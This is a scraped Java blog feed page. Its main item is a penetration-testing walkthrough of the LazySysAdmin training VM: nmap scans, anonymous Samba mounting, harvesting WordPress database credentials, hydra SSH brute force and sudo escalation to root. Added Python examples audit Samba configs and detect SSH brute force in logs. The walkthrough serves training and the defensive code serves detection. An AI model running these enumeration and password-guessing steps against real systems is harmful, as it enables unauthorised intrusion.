Spring Tips: Bootiful Kotlin Redux [Video]

Hi, Spring fans! In this installment of Spring Tips, we’ll revisit Kotlin, leveraging more DSLs in both the Kotlin and Spring ecosystems.

Speaker: Josh Long

Kotlin Features I Miss in Java

Although I’m a big supporter of the Kotlin programming language, I still do a lot of Java programming on a daily basis for my employer. Since I’m aware of the great functionalities of Kotlin, I’m often struggling with Java, as it has some “pitfalls,” requires additional boilerplate, and misses many features.

In this post, I’d like to describe which Kotlin features I miss most when coding in Java.

Implementing Custom Exceptions in Java


We already talked a lot about exception handling on this blog and described the differences between checked and unchecked exceptions, best practices, and common mistakes. If you’ve read these posts, you probably recognized a pattern. You should provide detailed information about the situation that caused the exception, and you should not remove anything that might be useful to the caller.

Penetration Test Training – LazySysAdmin

Today we’re going to start our training session with a fairly decent image from vulnhub.com: LazySysAdmin: 1.
To use this image, just download and unzip it, then run it in VirtualBox.

Just be sure to create a host-only network beforehand, so we can find the virtual machine. The system itself will get an IP address via DHCP on this network. We’re using vboxnet4 here, so just adapt this to your networking.
We are also working on macOS 10.3, so be sure to adapt the used tools to your environment. We used the following tools:

If you want to install these tools with Homebrew, just add the tap feffi/homebrew-pentest:

$ brew tap feffi/homebrew-pentest

Everything up? OK, let’s start.

Meanwhile somewhere in outer space…

$ sudo netdiscover -i vboxnet4 -f -r
 Currently scanning: Finished!   |   Our Mac is: DE:AD:BE:EF:DE:AD - 0

 1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 1
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------    08:00:27:6d:95:4e   1      60    Unknown vendor

Ah, right, that’s fine. To reuse this IP in our tasks, we just shorten it a bit:

$ export ip=""
$ echo $ip

Nice, let’s start a common scanning for services:

$ nmap -sV -sC $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:20 CET
Nmap scan report for
Host is up (1.0s latency).
Not shown: 994 closed ports
22/tcp   open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 b5:38:66:0f:a1:ee:cd:41:69:3b:82:cf:ad:a1:f7:13 (DSA)
|   2048 58:5a:63:69:d0:da:dd:51:cc:c1:6e:00:fd:7e:61:d0 (RSA)
|   256 61:30:f3:55:1a:0d:de:c8:6a:59:5b:c9:9c:b4:92:04 (ECDSA)
|_  256 1f:65:c0:dd:15:e6:e4:21:f2:c1:9b:a3:b6:55:a0:45 (EdDSA)
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
|_http-generator: Silex v2.2.7
| http-robots.txt: 4 disallowed entries
|_/old/ /test/ /TR2/ /Backnode_files/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Backnode
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL (unauthorized)
6667/tcp open  irc         InspIRCd
| irc-info:
|   server: Admin.local
|   users: 1
|   servers: 1
|   chans: 0
|   lusers: 1
|   lservers: 0
|   source ident: nmap
|   source host:
|_  error: Closing link: (nmap@ [Client exited]
Service Info: Hosts: LAZYSYSADMIN, Admin.local; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 59m57s, deviation: 0s, median: 59m57s
|_nbstat: NetBIOS name: LAZYSYSADMIN, NetBIOS user: , NetBIOS MAC:  (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
|   Computer name: lazysysadmin
|   NetBIOS computer name: LAZYSYSADMIN\x00
|   Domain name: \x00
|   FQDN: lazysysadmin
|_  System time: 2017-11-05T00:22:19+10:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2017-11-04 15:22:19
|_  start_date: 1601-01-01 00:53:28

Ok, that’s a lot of surface to cover. Let’s start with the laziest type of service: Samba. As we can see, the guest account is accepted at user authentication level, which is nice. Before we continue, we note down everything that might be a username or password:

$ echo "TR2" >> login.txt
$ echo "guest" >> login.txt
$ echo "LAZYSYSADMIN" >> login.txt
$ echo "lazysysadmin" >> login.txt
$ echo "x00" >> login.txt

Let’s chat…

Having a look at the IRC daemon…

$ telnet 6667

Escape character is '^]'
:Admin.local NOTICE Auth :*** Looking up your hostname... 

>>PASS none

:Admin.local NOTICE Auth :*** Could not resolve your hostname: Request timed out; using your IP address ( instead.

>>NICK Bla
>>USER blah blah blah blah

:Admin.local NOTICE Auth :Welcome to Localnet!
:Admin.local 001 Bla :Welcome to the Localnet IRC Network Bla!blah@
:Admin.local 002 Bla :Your host is Admin.local, running version InspIRCd-2.0
:Admin.local 003 Bla :This server was created 14:52:33 Mar 29 2016
:Admin.local 004 Bla Admin.local InspIRCd-2.0 iosw biklmnopstv bklov
:Admin.local 005 Bla AWAYLEN=201 CASEMAPPING=rfc1459 CHANMODES=b,k,l,imnpst CHANTYPES=# CHARSET=ascii ELIST=MU FNC KICKLEN=256 MAP MAXBANS=60 MAXCHANNELS=20 MAXPARA=32 MAXTARGETS=20 :are supported by this server
:Admin.local 005 Bla MODES=20 NETWORK=Localnet NICKLEN=33 PREFIX=(ov)@+ STATUSMSG=@+ TOPICLEN=308 VBANLIST WALLCHOPS WALLVOICES :are supported by this server
:Admin.local 042 Bla 690AAAAAD :your unique I
:Admin.local 375 Bla :Admin.local message of the day
:Admin.local 372 Bla :- Please edit /etc/inspircd/mot
:Admin.local 376 Bla :End of message of the day.
:Admin.local 251 Bla :There are 1 users and 0 invisible on 1 servers
:Admin.local 254 Bla 0 :channels formed
:Admin.local 255 Bla :I have 1 clients and 0 servers
:Admin.local 265 Bla :Current Local Users: 1  Max: 1
:Admin.local 266 Bla :Current Global Users: 1  Max: 1

Checking for weaknesses in InspIRCd-2.0… only DoS and spoofing, no remote access known. Let’s move on to the next one.

Samba, Samba, olê…

Now we can enumerate the Samba shares as guest:

$ nmap -sV --script=smb-enum-shares -p445 $ip
Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-04 14:25 CET
Nmap scan report for
Host is up (0.00054s latency).

445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
Service Info: Host: LAZYSYSADMIN

Host script results:
| smb-enum-shares:
|   account_used: guest
|   \\\IPC$:
|     Comment: IPC Service (Web server)
|     Users: 1
|     Max Users: 
|     Path: C:\tmp
|     Anonymous access: READ/WRITE
|     Current user access: READ/WRITE
|   \\\print$:
|     Comment: Printer Drivers
|     Users: 0
|     Max Users: 
|     Path: C:\var\lib\samba\printers
|     Anonymous access: 
|     Current user access: 
|   \\\share$:
|     Comment: Sumshare
|     Users: 0
|     Max Users: 
|     Path: C:\var\www\html\
|     Anonymous access: READ/WRITE
|_    Current user access: READ/WRITE

Oh, nice! A guest-writable share. Maybe we can snoop around…

$ mkdir share
$ mount_smbfs //guest:@$ip/share$ share
$ cd share
$ tree -L 2 .
├── Backnode_files
│   ├── failure-good-thing-fixed.png
│   ├── front-end.css
│   ├── front-end.js
│   ├── jquery-ui.js
│   ├── jquery.js
│   ├── logo.png
│   ├── normalize.css
│   ├── pageable.js
│   ├── picto1.png
│   ├── picto2.png
│   ├── picto3.png
│   ├── script.json
│   ├── styles.css
│   └── tumblr_lb4pi2yt1C1qb2xivo1_500.gif
├── apache
├── deets.txt
├── index.html
├── info.php
├── old
├── robots.txt
├── test
├── todolist.txt
├── wordpress
│   ├── index.php
│   ├── license.txt
│   ├── readme.html
│   ├── wp-activate.php
│   ├── wp-admin
│   ├── wp-blog-header.php
│   ├── wp-comments-post.php
│   ├── wp-config-sample.php
│   ├── wp-config.php
│   ├── wp-content
│   ├── wp-cron.php
│   ├── wp-includes
│   ├── wp-links-opml.php
│   ├── wp-load.php
│   ├── wp-login.php
│   ├── wp-mail.php
│   ├── wp-settings.php
│   ├── wp-signup.php
│   ├── wp-trackback.php
│   └── xmlrpc.php
└── wp

Really? A WordPress installation! Let us check this first.

$ grep DB_USER wordpress/wp-config.php
define('DB_USER', 'Admin');
$ grep DB_PASSWORD wordpress/wp-config.php
define('DB_PASSWORD', 'TogieMYSQL12345^^');
$ grep DB_NAME wordpress/wp-config.php
define('DB_NAME', 'wordpress');

Noted! We got our first username/password combination.

$ echo "deets" >> login.txt
$ echo "Admin" >> login.txt
$ echo "admin" >> login.txt
$ echo "TogieMYSQL12345^^" >> login.txt
$ echo "Togie" >> login.txt
$ echo "togie" >> login.txt

What else do we get here?

$ cat deets.txt
CBF Remembering all these passwords.

Remember to remove this file and update your password after we push out the server.

Password 12345
$ echo "CBF" >> login.txt
$ echo "12345" >> login.txt

Yeah…sure…we updated it.

$ cat todolist.txt
Prevent users from being able to view to web root using the local file browser

Done. So we have collected some material here, but where can we use it?
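The share$ finding above (a guest-writable export of /var/www/html/, which is exactly what the admin's todolist item was supposed to prevent) is a plain smb.conf misconfiguration. The following audit script is an added example, not code from the original post or from Samba: it parses an smb.conf, flags shares guests can reach or write to, shares that export a web root, and a global "map to guest" fallback, and shows a weak configuration beside a hardened one. The two configs, the share names and the WEB_ROOTS list are constructed assumptions.

```python
"""Audit an smb.conf for guest-reachable shares and exported web roots.
Added example, not code from the original post or from Samba; the configs,
share names and WEB_ROOTS below are constructed assumptions."""
import re

WEB_ROOTS = ("/var/www", "/srv/www", "/srv/http")  # assumed common web roots
YES = {"yes", "true", "1"}


def parse_smb_conf(text):
    """Minimal smb.conf parser: {section: {normalised key: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#;":
            continue
        m = re.match(r"\[(.+)\]$", line)
        if m:
            current = m.group(1).strip().lower()
            sections[current] = {}
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current][" ".join(key.lower().split())] = value.strip()
    return sections


def _flag(opts, *names, default=False):
    # First matching option wins; smb.conf has several synonyms per setting.
    for name in names:
        if name in opts:
            return opts[name].lower() in YES
    return default


def audit_shares(text):
    """Return (share, finding) pairs; an empty list means nothing risky."""
    conf = parse_smb_conf(text)
    glob = conf.get("global", {})
    findings = []
    mtg = glob.get("map to guest", "never").lower()
    if mtg != "never":  # unknown usernames silently become the guest account
        findings.append(("global", f"map to guest = {mtg}"))
    for name, opts in conf.items():
        if name == "global":
            continue
        guest = _flag(opts, "guest ok", "public", default=_flag(glob, "guest ok", "public"))
        # 'writable'/'writeable' are inverse synonyms of 'read only' (default: yes)
        writable = _flag(opts, "writable", "writeable") or not _flag(opts, "read only", default=True)
        path = opts.get("path", "?")
        if guest:
            mode = "guest-writable" if writable else "guest-readable"
            findings.append((name, f"{mode} share at {path}"))
        if path.startswith(WEB_ROOTS):  # wp-config.php and friends become readable
            findings.append((name, f"exports web root {path}"))
    return findings


# Constructed: roughly how the box above must have been configured.
WEAK_SMB_CONF = """
[global]
   map to guest = Bad User
[print$]
   path = /var/lib/samba/printers
   read only = yes
   guest ok = no
[share$]
   comment = Sumshare
   path = /var/www/html/
   guest ok = yes
   writable = yes
"""
# Constructed: guests refused, fallback disabled, web root no longer exported.
HARDENED_SMB_CONF = (WEAK_SMB_CONF.replace("Bad User", "Never")
                     .replace("/var/www/html/", "/srv/samba/sumshare")
                     .replace("guest ok = yes", "guest ok = no"))
```

Running audit_shares over the real /etc/smb.conf of a box is the quick way to catch this class of leak before an anonymous share hands out wp-config.php.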

Land of the Apache

Maybe we should enumerate a little further. We have a website listening on port 80. Let’s spider it:

$ dirb http://$ip
DIRB v2.22
By The Dark Raver

START_TIME: Sat Nov  4 14:38:59 2017
WORDLIST_FILES: /usr/local/share/dirb/wordlists/common.txt



---- Scanning URL: ----
+ (CODE:200|SIZE:36072)
+ (CODE:200|SIZE:77236)
+ (CODE:200|SIZE:92)
+ (CODE:403|SIZE:292)
... (lots of output)

Ok, while dirb is still running, we already have some interesting directories to look at:


And some more. We’ve already seen those in the Samba enumeration. Let’s try the WordPress site then…

$ curl -v
My name is togie.
My name is togie.
My name is togie.
My name is togie.

Hmm, that togie again… hmm, maybe… we can try SSH…

Serpentine water monster

Let us try our already filled login list:

$ hydra -t 4 -L login.txt -P login.txt ssh://$ip
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2017-11-04 20:35:23
[DATA] max 4 tasks per 1 server, overall 4 tasks, 169 login tries (l:13/p:13), ~43 tries per task
[DATA] attacking ssh://
[STATUS] 128.00 tries/min, 128 tries in 00:01h, 41 to do in 00:01h, 4 active

[22][ssh] host:   login: togie   password: 12345

1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2017-11-04 20:36:42

Nice! So we log in using togie with password 12345.
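A run like the one above (169 guesses at about 128 tries per minute, followed by one accepted password) is loud in /var/log/auth.log. The detector below is an added example, not from the original post: it counts failed sshd logins per source address in a sliding window, flags a source that crosses a threshold, and records a later successful login from that source, which is the togie/12345 outcome. The log lines are constructed in the Ubuntu 14.04 sshd syslog format, and the year 2017 is assumed because syslog timestamps carry none.

```python
"""Flag an SSH password-guessing burst, like the hydra run above, in auth.log.
Added example, not from the original post: counts failed logins per source in
a sliding window and records a later success from a flagged source (the
togie/12345 outcome). Log lines below are constructed; 2017 is assumed since
syslog timestamps carry no year."""
import re
from collections import defaultdict, deque
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$")


def parse(line):
    """Return (timestamp, 'Failed'|'Accepted', user, src) or None for other lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime("2017 " + m["ts"], "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["src"]


def detect_bruteforce(lines, threshold=20, window_s=60):
    """Return [(src, distinct_users_tried, accepted_user_or_None)] per flagged source."""
    recent = defaultdict(deque)   # src -> timestamps of failures inside the window
    users = defaultdict(set)      # src -> usernames tried
    accepted = {}                 # flagged src -> user that later got in (or None)
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ts, result, user, src = rec
        if result == "Failed":
            q = recent[src]
            q.append(ts)
            users[src].add(user)
            while (ts - q[0]).total_seconds() > window_s:
                q.popleft()
            if len(q) >= threshold:
                accepted.setdefault(src, None)
        elif src in accepted:     # success right after a burst: likely a guessed password
            accepted[src] = user
    return [(src, len(users[src]), accepted[src]) for src in sorted(accepted)]


def _line(sec, result, user, src):
    """Constructed sshd line in Ubuntu 14.04 syslog format (hostname from the box)."""
    inv = "" if user == "togie" else "invalid user "
    return (f"Nov  4 20:35:{sec:02d} LazySysAdmin sshd[1234]: {result} password "
            f"for {inv}{user} from {src} port 5{sec:04d} ssh2")


# Constructed: one stray failure from elsewhere, then 24 guesses from a single
# source inside a minute, then a success from that same source.
SAMPLE_LOG = (
    [_line(5, "Failed", "togie", "192.0.2.20")]
    + [_line(s, "Failed", u, "192.0.2.10")
       for s, u in enumerate(["guest", "admin", "togie", "CBF"] * 6)]
    + ["Nov  4 20:36:42 LazySysAdmin sshd[1300]: Accepted password for togie "
       "from 192.0.2.10 port 50100 ssh2"]
)
```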

$ ssh togie@$ip
#                                          Welcome to Web_TR1                                    #
#                             All connections are monitored and recorded                         #
#                    Disconnect IMMEDIATELY if you are not an authorized user!                   #

togie@'s password: 12345
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Nov  5 02:24:33 AEST 2017

  System load:  0.0               Processes:           177
  Usage of /:   48.5% of 2.89GB   Users logged in:     0
  Memory usage: 31%               IP address for eth0:
  Swap usage:   0%

  Graph this data and manage this system at:

133 packages can be updated.
0 updates are security updates.


So we got a shell. Let’s enumerate further.

togie@LazySysAdmin:~$ id
uid=1000(togie) gid=1000(togie) groups=1000(togie),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lpadmin),111(sambashare)

We are in the sudo group…


$ sudo su -
[sudo] password for togie: 12345
root@LazySysAdmin:~# ls -al
total 28
drwx------  3 root root 4096 Aug 15 23:10 ./
drwxr-xr-x 22 root root 4096 Aug 21 20:10 ../
-rw-------  1 root root 1050 Nov  3 14:45 .bash_history
-rw-r--r--  1 root root 3106 Feb 20  2014 .bashrc
drwx------  2 root root 4096 Aug 14 20:30 .cache/
-rw-r--r--  1 root root  140 Feb 20  2014 .profile
-rw-r--r--  1 root root  347 Aug 21 19:35 proof.txt


$ cat proof.txt

Well done :)

Hope you learned a few things along the way.


Togie Mcdogie

Enjoy some random strings



The post Penetration Test Training – LazySysAdmin appeared first on codecentric AG Blog.

Lambda Calculus for Mortal Developers

Lambda Calculus sounds like an arcane term that only functional programming wizards can understand. Nothing could be further from the truth. We use Lambda Calculus every day when we program. It is the most reducible form of all Functional Programming languages; the primitive building block of Functional Programming.

The Atoms of Lambda Calculus

Lambda Calculus is based on three basic building blocks: expressions, variables, and functions, which are combined to form other expressions.

What Is Project Valhalla?

For over three years, Project Valhalla has been a buzzword in the Java community, but even with all of this anticipation and foreboding, surprisingly little has been published on this important project. For some, it means the ability to create value types, and for others, it means reified generic runtime types.

But through all of the confusion and desire, Project Valhalla has a very specific purpose: To cease the requirement that Java developers choose between performance and abstraction. In this article, we will clear up the confusion about what Project Valhalla is and what it brings to the table. In doing so, we will examine what is and what is not included in the project as well as delve into the reasoning behind each of the major inclusions and exclusions.

Beyond Headless Content: Layout as a Service in dotCMS

Javalobby Syndicated Feed - Fri, 10-Nov-17 14:01

Expect More Than Content

You should expect more than just content from your REST APIs. With "Layout as a Service", or LaaS-ie (groan), you can get the benefits of a traditional CMS-driven experience with the developer friendliness of CaaS. Layout as a Service makes app/CMS integrations (including previews) extraordinarily straightforward. Scroll down to "The Goods" for example code.

Give it a REST

In the CMS space, RESTful access to content (Content as a Service, CaaS, Headless CMS, etc.) is all the rage. With the rise of modern JavaScript frameworks and Single Page Apps, it is pretty easy to see why. Content as a Service allows the decoupling of the management of content from the presentation of that content and gives developers access to content in a familiar JSON format. This is a huge benefit for developers as they are no longer tied to developing in what they might consider old-fashioned CMS-based page presentations. Developers can develop (read: play) with the latest modern application technologies, Angular, React or whatever and access / inject business managed content into their apps via REST. The good news is that dotCMS has had these REST endpoints for years. Hooray Developers, right?

Intel: Machines Without Storage (Only Memory) Are Coming

Are traditional storage's days numbered? The push is on to perfect an open-source technology that allows your applications to keep data in memory — shut down the application and the machine — but the data will still be there when you need it.

Eric Kaczmarek, a senior Java performance architect in Intel’s Software Solution Group, spoke about this topic at the In-Memory Computing Summit Oct. 24 in San Francisco. His session was titled, "In-Persistent-Memory Computing with Java." 

Inside the Java Virtual Machine (Part 3): Data Types [Video]

This video discusses data types inside the JVM, including breakdowns of primitive and reference types and how data resides in the JVM's memory. This is the next post in my series.

Don't Fear the Lambda

Javalobby Syndicated Feed - Fri, 10-Nov-17 01:01

I just want to share my experience in using lambda expressions in Java. I must say that I was always very skeptical how they could be used, where they could be used, and why they should be used. This fear stopped my understanding of this very interesting concept for a long time.

Lambda Expressions

To begin with, lambda expressions are actually functions written in Java that are passed to our methods as parameter objects. Earlier, we could define functions in Java only as methods, but now we can also use them inside method bodies.

Secure Your Java App With Spring Security, Thymeleaf, and Okta

User management functions are required by a wide variety of apps and APIs, and it's a common use-case to partition access to parts of an application according to roles assigned to a user. This is the basis of role-based access control (RBAC). Okta manages these roles with groups. Users can belong to one or more groups. With the Okta Spring Security integration, these groups are automatically mapped to roles that can be called out in your application to grant or deny access. This is all done using common Spring Security annotations as you'll see below.

Okta’s Java dev team is working hard on our next generation SDK and integrations. With Okta’s integration for Spring Boot and Spring Security, you can wire up your Okta tenant to a Spring Boot application and take advantage of the built-in RBAC.

Utilizing Apache NetBeans With JDK 9 [Snippet]

Did you know that you can build Apache NetBeans from scratch today and utilize the latest JDK 9 features? Here is how to do it:

Clone the NetBeans Incubator sources to your machine:

Javalobby Syndicated Feed - Thu, 09-Nov-17 07:01

Before we start with this week's quiz, here is the answer to Java Quiz 3: Handling Exceptions

  1. By passing the parameters 13 and 0 to the method print, the statement nr = accounts[i] / i2; causes an ArrayIndexOutOfBoundsException. The reason is that element 13 doesn't exist. The equation nr = accounts[i] / i2; first tries to access element 13, then divides the number by zero. The code doesn't handle ArrayIndexOutOfBoundsExceptions, but the Exception is a generic Exception handler. The statement System.out.print("T"); writes T to the standard output.

Categories: Java

Javalobby Syndicated Feed - Thu, 09-Nov-17 04:01

Let’s begin with the basic differences between unit testing and component testing, and then we will have a look at a practical application of unmanaged services in Lagom with its test cases.

Unit Testing and Component Testing

Unit testing involves the testing of individual units (classes) to demonstrate that the program executes as per the specification and that it validates the design and technical quality of that particular unit. The called components are replaced with stubs, simulators, or trusted components that are used to simulate the behavior of interfacing modules.

Accessing the EntityManager From Spring Data JPA

Spring Data JPA allows you to rapidly develop your data access layer through the use of Repository interfaces. Occasionally, you will need to access the EntityManager from Spring Data JPA. This post shows you how to access the EntityManager.


The purpose of the EntityManager is to interact with the persistence context. The persistence context will then manage entity instances and their associated lifecycle. This was covered in my blog post on the JPA Entity Lifecycle.

Resolve Me, Implicitly

Javalobby Syndicated Feed - Wed, 08-Nov-17 22:01

Reading my posts, you can easily find that there is a topic that I care about a lot: Dependency management in the development process. There is a feature of the Scala programming language that I've liked since the beginning. Without any external library, it is possible to successfully implement various dependency injection mechanisms. In the past, I wrote about the Cake pattern. Now it’s time to talk about dependency injection through the use of implicits. Let's start the race!

The Problem: Dependency Injection


I have written many times about this topic, so I will not make a long introduction. To summarize, every time a component needs to send a message to another component, a dependency is defined between them. Components may be packages, classes, functions, and so on. Messages are always associated with methods or functions calls. Dependency between two components can have many levels of strength. If you want a complete explanation of the dependency concept, have a look at this post: Dependency. For the sake of completeness, let’s give an example of the simplest type of dependency: Association.

Lambda Expressions in Java 8

Let's start with lambda expressions. What are they? And how do they work?

I Googled lots of posts and YouTube videos before now to understand lambda expressions, but I found it difficult to understand because I haven't used any functional language before. So I decided to write a blog post to help people like me.

A New Mocking Tool for Kotlin

One pain point in testing Kotlin code is mocking. Have you ever tried to use a Mockito wrapper? It tries to hide this Java dinosaur in a DSL, but it still feels so unnatural and Java-ish.

In this article, I'd like to present a shiny new pure Kotlin mocking library — MockK. Its main philosophy is first-class support for Kotlin features. Thus, your code using coroutines or lambda blocks naturally fits into a simple DSL describing the behavior of objects.

This Week in Spring: Java Proposals and Spring Shell

Hi, Spring fans! Welcome to another installment of This Week in Spring! This week I’m in Antwerp, Belgium, for the amazing Devoxx (Belgium) event. I’m co-presenting with my friends Matt Raible and Mark Heckler on progressive web applications and reactive Spring. I’ll be joined by a lot of Pivotal and Spring teammates here so make sure to check the schedule.

Later this week I’ll be doing a joint webinar — Grails for the Spring Boot Developer — with Grails co-founder Jeff Scott Brown.

Positional Parameters in Java: An Update

Recently, I published an article titled Overcoming Positional Parameter Parsing in Java, where I presented a few methods that can be used to help programmers overcome the attitude of referring to command line arguments as args[0], args[1], and so on.

The article was viewed by many people, but most importantly, there was a lot of 'constructive' feedback. This, in other words, is to say that many pulled my ears and pointed out the flaws in the code.


